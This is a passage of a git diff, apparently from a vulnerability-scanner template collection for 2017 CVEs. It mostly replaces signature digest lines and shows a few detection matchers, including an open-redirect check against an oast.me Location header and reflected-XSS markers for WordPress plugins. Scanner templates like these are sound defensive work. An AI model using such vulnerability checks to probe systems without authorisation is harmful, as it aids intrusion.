4b0a004830460221009ba13cf1e72902ee275f6c64e70a38b140fefdc045ec966b97e51bc344a4326a022100b825422e8bf3e1bc8b51128e2b3a870d62954d118b05ea1ad5ce48b8cd1576e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022074794653c30c6d3470c4cf0b85cd25984bf6ada15730528c5c5ed816887bfe9102204934394f8fbf18af0d56f758dafdd43064ce19a1e8e0423f3b29cdd35712704e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index 1cc7c32b27..b009f0479a 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200fa8898e1cf51cd31c5984c45336ece80f13eaeb8be7ba824990411e3382e2c10220221edd6505e87f366ad460007521cfae0cb356c6f80b9aac14426ecb5f7fd9e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c90e29cb7539b0976249f632ac3ddc7742c2d5cc7224ffc75a62470763ea2874022100fbc08500fc7426580a3710238397a5f7f1b92e256d8ea785f5421d7f4269f2fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12611.yaml b/http/cves/2017/CVE-2017-12611.yaml index ea271686b8..47d9e940fa 100644 --- a/http/cves/2017/CVE-2017-12611.yaml +++ b/http/cves/2017/CVE-2017-12611.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022051cf097709453b12f0cc29e773f45c31c2b20072297945baec3738f572736d86022100eaa8fbf9eda6e1e35f8c7656e278984ce520120d8708b9acd39fc5dd1c9b36b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bbb14b27d54e45439e98c55cf91fcf2c994e4f823c35fb51023cceab97754576022100eb778aadb0a5245069223906dd19510c20539d14d3d48a97539a776fc247d9dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml index 5a01423e87..2987782ff5 100644 --- a/http/cves/2017/CVE-2017-12615.yaml +++ b/http/cves/2017/CVE-2017-12615.yaml @@ -69,4 +69,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e80d5d21eaa1b74a5c141cd029262af7130c1f34c5b0459e6f24674e7c72ca4d02206226f184519ceb0746fde9a5297b181c8c2b920c0ee57a54f4cbbb7bee9a10bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205a9a23994fe9435513265049fb3cb79fd712f088936d8363f7fd57f51b04deef022100aaa89552c780f690f151423bf72ca9b0107dacc9f6e4a705f88757f001d0fb78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index bdaff53c66..1613225205 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022071dd9ceebc684a86c7228090991c25617ba66553c9eec6ee5f11e443ff2547ed0220218ceb7e4518153d87360260c9296f3d59d2c55be49855e35f62e9d2a89f053d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022031992eadeb5d62cf7cf2ee51ad626b360ce3baaa22ed1cbbf2c124ecf9408a090220768d1bfe43c7e9551f67b15a866628478f2e02ef1b06789e2c8e0739cd2710d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml index ab65a70a32..1b07c33fef 100644 --- a/http/cves/2017/CVE-2017-12629.yaml +++ b/http/cves/2017/CVE-2017-12629.yaml @@ -51,4 +51,4 @@ http: regex: - '"name"\:"(.*?)"' internal: true -# digest: 4a0a0047304502205ff3b10fb167431b4e908557875123ac30c0ac74a17397bd111623259b056e24022100ac61faf3402994f493e17f6c487d49f3c0b7b1bdca2eacae7394b4d639c677bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207f08772a2ca9edfe3a693b503c592675bbadaa88696c12da3da79c7749e3e9e0022100a74c0cd62c4fa35cdc4c816142d9d4d595861776d2ebcdaa5c3a05025593de48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml index c604e68566..792f9e4cc8 100644 --- a/http/cves/2017/CVE-2017-12635.yaml +++ b/http/cves/2017/CVE-2017-12635.yaml @@ -63,4 +63,4 @@ http: status: - 201 - 409 -# digest: 490a00463044022062e948131457520bf5719b89023b98b4fd948ebc16f8fcfaf5fa88628105402102202c73f0347a1ac0f0b49dd102d966e0f21fdf1db2a9b537508c6a12a202ab61c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202f6c6ff7a1e527a3b25e8e6ac8a573926e2df345ae4aadcac143c42a9238237b0220393e9f4bad2a5f585d1ece0a58e24c38f28cbd15b315eb2193af2608e7b86fce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index 39a2f5188e..4da406ce90 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a8683657514f719b732f05c7f6d45ec7dfa7e1e84cfb94bc48f4f48dfb98d72b022100c7903e2a07cc85ba954eac808f177b137a97309cdafbe60db6302fde5ed5c8bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220147dba64fa41e2f27b169596c143c1a1430e643061608a24e3f62168d71fbe3d0220761972f9fc830334fd5dfe303eba3d82f31923ed6cb5ce02e76be86673c7a2af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index 25e8a01d27..8fae38185b 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c3e6f228ecb88b45dede1fdb09bc0de8eb69e3910bef23a8b392cc658b900416022100f5764bd903049f446e74a2490b9686da2809edffc40fba47ccd1bacfc8051eb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f075740072d040d96268683938c294c96805c70cf60b9996ce56a796b0661f6b022032326a6287ae9c189aa70de4101986dfb092409af8cf2f873de6ff07129084bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index 53e8db3460..e394c0aeeb 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220157cb388a5c368f67fd096a8be0f564c05cba5a2904f26d045b060193aef26a3022008e6bb9ac07464019fc095732ee47003a68d85f4d3fb0dcbc9b69afe4e813713:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b9d7189af48df53df0c7fc8dee1744297ce1241688e92f90c689588296f4384c02203809841632ef0a6d83616de3d5da25a0b67b6e2c2b23623a160ec3de1e063471:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml index 35377b6fdf..92857e4c25 100644 --- a/http/cves/2017/CVE-2017-14186.yaml +++ b/http/cves/2017/CVE-2017-14186.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022033e095c75c7ee5b5d4ff29049155c01dbe8b0adb0045f1f654f97d384138498302207247708359a6d804ac67feddbddc4ea3be54223fa25cc7f030bc91e32d323fa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203422e81ffabf54fa8534a1db960aeccd05a9d4b19c5da6d11136f89965dfa4b90220179115fa6a6668fa77e4e877a0fcc752f505a79bbfcd917da2c10e43806daaac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml index 5b7f7b930e..c288aa413e 100644 --- a/http/cves/2017/CVE-2017-14524.yaml +++ b/http/cves/2017/CVE-2017-14524.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' -# digest: 490a004630440220619f2ba461299fea2ef0aa4ee538657a6afcd1ec712499bf7ee16308cfbbcf42022055bc3bd8d4f45b3f53ff97de7cd4037a12ed3b24b776f6178d7eca86288fc6cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c9abc1dcd1e21a1a75be3fa0fbde2ebb5659f956fe11496d6f411c7c3f619977022100eddd7fdece8f551719680a1e33be59c2875ab48d3952002209c691b7181ae203:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14535.yaml b/http/cves/2017/CVE-2017-14535.yaml index a4bcde6634..3c902736d6 100644 --- a/http/cves/2017/CVE-2017-14535.yaml +++ b/http/cves/2017/CVE-2017-14535.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ca2eeb51d69833fce729ea7bccda8dcd482fc9561d5790e03a4a0a866b49cb30022100d971de87dda13d5f12f2d03ad203e5ff11adcac44cf8bb5ffd3bf915bf7f3d4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022004c2c0b0bfc6a4b5299eb051ed30519d948e89244430b213fad2de42968d5d0602207a33257c46086bb05aa71c1e223813644d52d434ee6d268a0c78b20851101d53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14537.yaml b/http/cves/2017/CVE-2017-14537.yaml index 08b59750e9..b0fe35e7ec 100644 --- a/http/cves/2017/CVE-2017-14537.yaml +++ b/http/cves/2017/CVE-2017-14537.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ce798eebc2e3146f836802ce53f92d76f694ba17ff0de6da85a6da34fb64153302203847448c352b718f2bbaf5fc50b231f4442e16c21728227241168cb38bce5995:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dfdc6074c62d2b9fa504221e526fa86d4918ccb5fa03a6d416b7c3e3db979398022100befa0ade8449e62b774fab5bf32a5397402c437966bb993ac5f882d24bedab9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index e9dda5f5a5..e1351efbef 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -52,4 +52,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "2kb-amazon-affiliates-store")' condition: and -# digest: 4a0a00473045022100fbe2638f2197d98f6d17eb8b14bba6aa3881a5802b758b859ef22d3cf902ad1802202ccb86f4fbc0b324795230c7d5844c8b3c46f39b812249c4a3820fae2582d5c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022100998118e38080d4de06fb94dd7347e0e0fe96b506f0cb955a8b0965849f96dace021f690cc9b2dc54da3ec77baae0fde22b6b453002f914f47f16813a9af1396d23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index f783db1dca..8d091ef7d7 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml @@ -46,4 +46,4 @@ http: part: header words: - "text/html" -# digest: 4b0a004830460221008b07f1f6dcdfb99425fda0917bc8613751fe16d663a0297826b0a3db4fe14afb022100f68ca3c53fdaa80a532ad2f794369719807edae411100178d0cf5c20baeff1ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100938d8535b39fe3f090348a8f130268b8c5b153fce1f953b9c8326526f651597d022100fa49268f5fcd4024fd36efb37ddfcef61fd82f879da31ea9f42ab6720725f7c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml index 4276e1c8bd..247210d5ee 100644 --- a/http/cves/2017/CVE-2017-14849.yaml +++ b/http/cves/2017/CVE-2017-14849.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d32e38e5c77d87ed4bf896dd4bdb9cdeee769be08f7fe2c698966d8ea053bbd3022100c83aa53a1e9d9a971011fe65d379b05b8f17d1ea1447f85808530b7f72493086:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c088f320a2af1f273ecba355210667a3b1855fd2118cb92534aa746d8610fb6402202ee14ebd16e59a080907747b7fda63735f178de5c4d29cb826d8662f97da77dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index 639c0a26f4..7a0391dc49 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml @@ -40,4 +40,4 @@ http: - type: word words: - 'Unknown command: ' -# digest: 4b0a00483046022100e93abdf24d9ebdfb400623b4a62901a6d7de1500c413707c694dafbc1281f705022100a25758a51d9bdecfb6f21cf981b25d44c7004255d0138a81424d72c178aab165:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206c61653a0972775ca878500b18fe9bd62710351751921be04a68c0df7ad7c961022064ecf4fefb2e1eb354f6691c8e7708f01ec373d872f8d4403b281fdf96a29475:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15363.yaml b/http/cves/2017/CVE-2017-15363.yaml index 1635997b18..efa3d6c495 100644 --- a/http/cves/2017/CVE-2017-15363.yaml +++ b/http/cves/2017/CVE-2017-15363.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220165ac278ba5a144b4ba8c0f774c904786c78a06bab7f65678eb9029af132ab8e0221009bb15f6f3a88dc6fee5e3a0a6a33ab8aecdd4131dc407ae5e2fd5b159fe9d332:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022019ec11663bf42cd8e94c7c8b2c2461e3c57e50c182d816434555b9cf490ca0f402204453fd5a76bf5cf9736bfa1f088c706328fe212b00a25cf3ada4f4df079308e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15647.yaml b/http/cves/2017/CVE-2017-15647.yaml index 3b53374a9c..648dc2b77f 100644 --- a/http/cves/2017/CVE-2017-15647.yaml +++ b/http/cves/2017/CVE-2017-15647.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b99b21136a7da51f6fde99bc313826c8e0cf6163b5eb0a1cd9f60058b9a2d9f302204c93df9c5308f861f92fd50798727bc52f8e0cfa37123bd8f35d83d8cf416c87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204975e7578731b8d831607f238852a79fd9461b8cba88f6a81e66cc2ef104528b02201fdaea83a9d5a50ef7c12bb727b23d1a71e081fc0c48dbcb7c927d1fba4bf436:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index f4489db9ff..7063e1d837 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -56,4 +56,4 @@ http: - type: dsl dsl: - 'contains(body_2, "{{randstr_1}}")' -# digest: 490a00463044022069ba591c8789f32ab114d7e83ef9294186d2663f7b3b9f1dd04da6b876bb306d022051e0fb2b787b48bffe629076ac4efa050ba50bfea5225a528357511d69466d41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eb88e3ec5c6a822bc5151c8a66a101b71bd44c2131872b1bd5d78e3f15ba32c2022100cd87753298c2971d5777f7554de2f906887a56d96d8f9ab274e078bb0aea306c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml index 32175184aa..39c382c727 100644 --- a/http/cves/2017/CVE-2017-15944.yaml +++ b/http/cves/2017/CVE-2017-15944.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b0524ec37a83dc42c2b65d5aaac79624687b7227515255ee075850523e653201022100899414ace80feab0f8077de3482984940b0ffa4b302405b75e6a9f900662f65b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210089cc17931e1d6681cdb2b5df68e321bbba5db7cc96051a11305730554534919802204ff54ecea6cbc5ae07defb91e35e43b5cba2cf32227d83d2f92b1cebcb43be7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml index b5beac8d6b..894a6c7191 100644 --- a/http/cves/2017/CVE-2017-16806.yaml +++ b/http/cves/2017/CVE-2017-16806.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022069b7891ad5aaca1653c140cd869d8ba35fe546084d82bd8b47bb0c8ea8e823dc02201217ec2f0810289d76d3f48a7e790a571718babd758b0888df0c94e79191bbfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cf8c309bf1314d3a80b452e38c0c02c7703bb85ebc04a1c8f240362f8006429702201a807a1251fb6065132daa26c24998b1f49ca5f736087704bddcbcb17938fafe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index f14735fbf3..8904a4eeb1 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ad6c79d8aabc67656e602bb168bd5eeceb6adc9d08c95328baf3c8332a97bd9102207ba6c60dcbd9f0be62d66d45a898c823b38a9c495abe192eb6823f6f924db40b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c250b9c908590d5296d8fd48225795617103cff1b0a0082f49eccc4317ef7c2e022100f718c49e8cd4c13a059b632b35040a5391bb6a6714822a1348371aa8b2d51137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml index c69161bc67..2919f17383 100644 --- a/http/cves/2017/CVE-2017-16894.yaml +++ b/http/cves/2017/CVE-2017-16894.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100914fea1c5c5534987b0dc8ea3a544420accc258866f44f710fad4491682b0bca022100f7a5f4ca76cea0ed4bbda6d945cee0182a2917e87824945712ce1b6fb4988113:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dfc379b3bb924c75cdb061d0bcb0743b0114124c679c6c9790e269c9f3a7b12d02200e272526a90ed45b73583ea29a42be4d99ae1843a5a412c9450ca346655972ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index 1fd7b056b5..c6c6e2e2a9 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210099b66f2b537913518129239b39f8a159700ddc127b1cacef95cc77ffc20ae2980221009c8e7999da3ad546302bf6fc02528bfb4b559370b20490ec03cb419fe9c5cb47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a47ba8fe795e24eae41bfc9caf426d7c8125edc1b96e4dac473cf902ba92da7a022100e45752a7a75829a4b675003b2160bfdd5fa85697cc7ecbe9b7b0116b23183e19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index 65d29eafbc..8458d67202 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008c4f13602a06f46d0d4a6887df2d973aeafffb6358c3aad171a0174bf239740202207e98d73e8472701429a91d4960f68b35bfa05b042381951899224ac8de4302c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022052df096f495d12383094390d5c4e343aa17b962673c7f3de10ce3ac8c1b405d60220243c5b0fb08f61ea3107258f4b172185dcfe9536e06a33d3c02a5ede63ad4011:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index f0352a4741..1fad0ebe4a 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220491d259e23e6cefe49a6a7b38773ccb1de991200484fb2caaecb31bcc41a6ca002203de830f8319daa563dfd24e34fcdc23dd63c2325348f95f05d31df7e2e3527c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a836d54763cb759d1205c7efe63ddd4b7a7bfe12bc5ddb4e1670cf23c29b32a002206b82a184da14a22c6def7c5cfa4a4cf90c3a4cec1269f45759534c6912262d43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml index 18fa86e540..c5f532af21 100644 --- a/http/cves/2017/CVE-2017-17562.yaml +++ b/http/cves/2017/CVE-2017-17562.yaml @@ -117,4 +117,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206d8b4f8428127f8b2379baa95eadcd604f9e7f9de8a7abc8a9f4105bca7cd921022100fbeddc2319778aa6b137c92b0c89423c7b8a8cfbbe4ad1b1fdf41b229e583285:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022024713dc3f85bab235b1af5c315c6e049d005cc3e4e54a7454a67b7cb3cf72e32022001924ba0245d5a092f320883d2c33f5ac516470e349dbd8c0990699b912cffbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml index 3876d9d04f..b42373bd6d 100644 --- a/http/cves/2017/CVE-2017-17731.yaml +++ b/http/cves/2017/CVE-2017-17731.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200156b1483e903ad84bb18d6c750cc7ed2dd09109d3cf8cb46eefe214a845b3d3022100becfb5c3c4f27c34f7668c14ccf18df54ca5a1edef33c06c4b3663dd683b6064:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f2e01f8021d1fd28bbf7be82f02e293c8877ec1753d5a9099115632c86d8626e02202a5ed4d4681616117af0dd19b472bcb0ffa59c33098aef8a9a74e7be6ade8008:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index 3863652610..398d8bb769 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -49,4 +49,4 @@ http: - "Database Setup" - "SQLServer" condition: and -# digest: 4a0a004730450221009d8309e4dcc4cb24832be6568404f920ce2d2a9537ebc8d4daf24e2a2f4a32fb0220488a5086a1b45f2b241f9aefb4f63e4f1b5e6002b72d0399d73ff793bf3a4213:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce08a45d60d30ae220ace51c94924d2c653d16995516a39fc6db5512a010cc0802205ac86c96ec6d0d6745d93a8cfed28df5afa9b622bd9db79787aef05fe9d94926:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index 533b7253ad..2202b12dda 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d45b414e76619a9ffcccb6c9966a573c4e8379c7d4cdb93c05ee828e5ba2f5b202203b05a6ca78bfacf9803a27c2cbf925878b02fce3cd5e8508793391ac31ba718c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f0834e9d28537dff177989860aa966dade71b3e97eb59f243c08a6e57e9aab59022100b0189b93af87a6789c8c61ac91f465ae826bd1da34459551d04e719250b22d3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18487.yaml b/http/cves/2017/CVE-2017-18487.yaml index 03c41999d0..d81ce7f8f4 100644 --- a/http/cves/2017/CVE-2017-18487.yaml +++ b/http/cves/2017/CVE-2017-18487.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Google AdSense")' condition: and -# digest: 4a0a00473045022100988c91cc5678d0341617c3e2bd50ff1a31d54f1a9b1b4991c4fa7632ef51dbc602206f8740ca6baa8b41a6361f38efc0d4e05268ef710ea286fe1fbf3ee108100861:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204e773854fc4d5e626d1588c88d757a817ce9d61957c4dfcac54562a9fa8ab4c802205fdb3252c167cb94b69d6ea4b597a6f508aca8ee87824772d38c983c80754c22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18490.yaml b/http/cves/2017/CVE-2017-18490.yaml index a41b382f00..87efaa35dd 100644 --- a/http/cves/2017/CVE-2017-18490.yaml +++ b/http/cves/2017/CVE-2017-18490.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Contact Form Multi by")' condition: and -# digest: 4a0a0047304502203360d67840b50fd68c1bc641a6fd0c4f538cf592ce676d69a9205fd9c4ca7784022100cb6b6f14a7b803230f45fb14120d18878e10df0845decc0ddb4792923805b223:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100af8d9228757121ce896f89dafb79d96341e1fd18e1d5a05d755b61150b4d05c1022100a525f5f70b01a50fb73e39960a962fb5f5cbb8bd8bbb37e1b95c238f6db63c72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18491.yaml b/http/cves/2017/CVE-2017-18491.yaml index 25b621f0ea..dbee6e8dc8 100644 --- a/http/cves/2017/CVE-2017-18491.yaml +++ b/http/cves/2017/CVE-2017-18491.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Contact Form by")' condition: and -# digest: 4b0a00483046022100ac3f9eee08479212a9d03beef0bea0ef0a2b76a1c50e51bff0945b291bc2b929022100e7ba20d358e1bc774eaa5c4e87b31c124b4785989b75d520089417b7eaa31697:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f2391602deb3ace4a617e2c232c2c8c47c17f772bf35e93bef9961e3a2a4bbb7022100bb118241e84847644d7d0efc659f3bbc00aa94b90fdc705cb85f4629da69c5c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18492.yaml b/http/cves/2017/CVE-2017-18492.yaml index a1419f1d5d..69f2eacefe 100644 --- a/http/cves/2017/CVE-2017-18492.yaml +++ b/http/cves/2017/CVE-2017-18492.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Contact Form to DB by")' condition: and -# digest: 4a0a0047304502207e93918672d169859d19e5324afe1f27c71bd96084452ae9d95246704afe9cc8022100f2755913f1b0027453f8a96aa3e96997fa7ee17e55c941db3131d84dcb2d2d0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ceaf62d39beb997b08b13654a1fcbad7d5ef8a13f15b57b224ddf2fbd6bf9b08022100f6b80b65cd2426c8af0df02257483ddf893b4459c7d8ba35e45a50f45fe373e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18493.yaml b/http/cves/2017/CVE-2017-18493.yaml index add6758764..7de4fa60be 100644 --- a/http/cves/2017/CVE-2017-18493.yaml +++ b/http/cves/2017/CVE-2017-18493.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Custom Admin Page by")' condition: and -# digest: 